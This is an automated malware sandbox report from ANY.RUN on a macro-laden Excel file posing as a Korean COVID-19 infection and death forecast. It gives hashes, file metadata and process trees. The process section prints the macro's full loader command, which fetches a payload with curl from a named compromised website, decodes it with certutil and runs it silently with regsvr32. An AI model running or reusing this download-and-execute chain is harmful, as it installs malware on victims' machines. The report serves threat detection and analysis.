analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

COVID-19 감염자 및 사망자 예측.xls

Full analysis: https://app.any.run/tasks/9041bc91-86c0-4ca0-8e36-e7a0330a7efc
Verdict: Malicious activity
Analysis date: July 13, 2020, 01:08:54
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
covid19
Indicators:
MIME: application/vnd.ms-excel
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: openpyxl, Last Saved By: USER, Name of Creating Application: Microsoft Excel, Create Time/Date: Wed Jul 8 18:51:14 2020, Last Saved Time/Date: Thu Jul 9 08:16:08 2020, Security: 0
MD5:

268EFE92A6E16C89E62BF0C32113D0C9

SHA1:

D42D766A18FC56170FF2978A2BF07BD9CAFAC3E8

SHA256:

00E82DD014370C9DB5A95FD0FD3A5438E4A51F4D64A15DDFFAA77F2E806D2A74

SSDEEP:

6144:wxEtjPOtioVjDGUU1qfDlavx+W2QnAbz3t3uWT9qwxfRj1NlSgD8lNSQyURDKVyc:c35v5fjvlZDKoQ949IQgQ9zU+kcC

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • EXCEL.EXE (PID: 3208)
    • Starts CMD.EXE for commands execution

      • EXCEL.EXE (PID: 3208)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 2108)
    • Starts CertUtil for decode files

      • cmd.exe (PID: 2108)
  • INFO

    • Drops Coronavirus (possible) decoy

      • EXCEL.EXE (PID: 3208)
    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 3208)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xls | Microsoft Excel sheet (48)
.xls | Microsoft Excel sheet (alternate) (39.2)

EXIF

FlashPix

CompObjUserType: Microsoft Excel 2003 Worksheet
CompObjUserTypeLen: 31
HeadingPairs:
  • Worksheets
  • 15
TitleOfParts:
  • world_case
  • world_death
  • asia_case
  • asia_death
  • europe_case
  • europe_death
  • america_case
  • america_death
  • africa_case
  • africa_death
  • ocean_case
  • ocean_death
  • 자료
  • 감염자 예측
  • 사망자 예측
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CodePage: Unicode (UTF-8)
Security: None
ModifyDate: 2020:07:09 07:16:08
CreateDate: 2020:07:08 17:51:14
Software: Microsoft Excel
LastModifiedBy: USER
Author: openpyxl
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
39
Monitored processes
5
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start excel.exe no specs cmd.exe no specs certutil.exe no specs cmd.exe no specs timeout.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3208"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /ddeC:\Program Files\Microsoft Office\Office14\EXCEL.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
14.0.6024.1000
2108cmd /c curl "http://refeeldominicana.nwideas.com/wp-content/uploads/chimps/category.php" -o "%temp%\1.tmp"&certutil -decode "%temp%\1.tmp" "%temp%\lk.tmp"&cmd /c del "%temp%\1.tmp"&timeout 60&regsvr32 /s "%temp%\lk.tmp"C:\Windows\system32\cmd.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2088certutil -decode "C:\Users\admin\AppData\Local\Temp\1.tmp" "C:\Users\admin\AppData\Local\Temp\lk.tmp"C:\Windows\system32\certutil.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
CertUtil.exe
Exit code:
2147942402
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3088cmd /c del "C:\Users\admin\AppData\Local\Temp\1.tmp"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
860timeout 60C:\Windows\system32\timeout.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
timeout - pauses command processing
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
796
Read events
666
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
1
Text files
0
Unknown types
7

Dropped files

PID
Process
Filename
Type
3208EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVRCD45.tmp.cvr
MD5:
SHA256:
3208EXCEL.EXEC:\Users\admin\AppData\Local\Temp\~DF9457A71352E07E7A.TMP
MD5:
SHA256:
3208EXCEL.EXEC:\Users\admin\AppData\Local\Temp\~DF1486B84E371BE188.TMP
MD5:
SHA256:
3208EXCEL.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1CA92D8C.emfemf
MD5:50BEF0FC1D1741D0CA3BBA19B2ACF71C
SHA256:C904300F6CCD82506C5D7C3CBEBA44B38430566C99964D1259460CF30DE8AA8E
3208EXCEL.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B552AC4E.emfemf
MD5:BD3D13AFA2AB30D1777D6A830594554B
SHA256:CB38AAC890CE449DA8692D617424F6D72F1CF709C17B0452AC1A2DA5F5E91FD4
3208EXCEL.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F226BC40.emfemf
MD5:3E9FFDD275AC38C8AA6C2E9665E75462
SHA256:DFA4168D55AE03F22C0F9D744557CB2FE7BCFF52866FC4B5B26EB682DDA5DA06
3208EXCEL.EXEC:\Users\admin\AppData\Local\Temp\COVID-19 감염자 및 사망자 예측.xlsdocument
MD5:A46026F83F88798D3AB36E0B6448B2C9
SHA256:2B01BA116169A6E00E83AB25F85236FB21903E880B3CBEADC9EFF20790A8A25D
3208EXCEL.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F977D3F7.emfemf
MD5:240B486BB1A716ED73194870173AC5C9
SHA256:A743ACB7F05CCB615B50B70C47325D723E5A9762E0C2D4976F2C32675966D445
3208EXCEL.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1D390F41.emfemf
MD5:F02D196959169825608B8081C866AE6B
SHA256:376A571E5584F3F2AEC5FCC21A4C5AC9B53B6E97ABA2EA6811A65C338EBC6483
3208EXCEL.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E1A4847B.emfemf
MD5:F53FBE8CD5C53676C283FCA53D319CA0
SHA256:7BB98D54E83677AC7092C789AD5CF8DC3CB82BE002F2CBFC8B094BE37AA7FE87
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
0
DNS requests
0
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

No data

DNS requests

No data

Threats

No threats detected
No debug info